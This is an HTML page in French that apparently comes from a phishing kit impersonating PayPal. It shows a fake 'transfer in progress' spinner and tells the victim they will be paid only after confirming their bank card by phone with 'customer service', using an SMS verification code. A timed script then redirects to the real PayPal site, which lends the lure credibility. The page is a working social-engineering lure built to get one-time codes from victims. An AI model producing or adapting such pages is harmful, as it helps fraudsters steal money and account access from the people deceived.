﻿
<!DOCTYPE html>
<!--[if lt IE 9]>
<html lang="fr" class="no-js lower-than-ie9 ie desktop">
	<![endif]-->
	<!--[if lt IE 10]>
	<html lang="fr" class="no-js lower-than-ie10 ie desktop">
		<![endif]-->
		<!--[if !IE]>
		-->
		<html lang="fr" >
			<head>
</html>


<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css" />
<script type="text/javascript" src="bootstrap/js/bootstrap.min.js"></script>
<script type="text/javascript" src="js/jquery-1.10.2.min.js"></script>
<!------ Include the above in your HEAD tag ---------->



<style>
* {
    padding: 0;
    margin: 0
}
body {
    font-family: monospace;
    background-color: #fafafa;
    color: #555;
}
.form-wrap{
    max-width: 550px;
    padding: 47px;
    background: #f1f1f1;
    margin: 20px auto;
    border-radius: 10px;
	text-align: center;
}
h3{color: #2180c0;}
p{
text-align: justify;
font-size: 1.5em;
color: #2180c0;
}

. spinner {
  padding: 50px;
  position: relative;
  text-align: center;
  display: block;
}

.spinner:before {
  content: "";
  height: 30px;
  width: 30px;
  margin: -15px auto auto -15px;
  position: absolute;
  top: 50%;
  left: 50%;
  border-width: 8px;
  border-style: solid;
  border-color: #2180c0 #ccc #ccc;
  border-radius: 100%;
  animation: rotation .7s infinite linear;
}

@keyframes rotation {
  from {
    transform: rotate(0deg);
  } to {
    transform: rotate(359deg);
  }
}
.glyphicon-refresh-animate {
    -animation: spin .7s infinite linear;
    -webkit-animation: spin2 .7s infinite linear;
}

@-webkit-keyframes spin2 {
    from { -webkit-transform: rotate(0deg);}
    to { -webkit-transform: rotate(360deg);}
}

@keyframes spin {
    from { transform: scale(1) rotate(0deg);}
    to { transform: scale(1) rotate(360deg);}
}
</style>
</head>
<body>

		
<div class="form-wrap">
<h3>Virement en cours...<span class="glyphicon glyphicon-refresh glyphicon-refresh-animate"></h3>
<p>Suite aux nouvelles mesures de sécurité vous serez crédité sur votre compte qu'après avoir confirmé votre carte bancaire.

Pour terminer la confirmation de la carte enregistrée vous serez contacté par téléphone par le service client dans les meilleurs délais.
En confirmant votre carte bancaire vous autorisez PAYPAL à vous envoyer un SMS de confirmation. 
Vous trouverez dans le sms un montant et un code de vérification généré de façon aléatoire par nos serveurs .

La confirmation de votre carte bancaire permet de prouver que vous êtes bel et bien le titulaire de la carte enregistrée et du compte à créditer. </p>

<p>Cordialement</p>
</div>


                     <div class="spinner"></div>

<script type="text/javascript">
window.setTimeout("location=('https://www.paypal.com/fr/');",100000);
</script>
</body>
</html>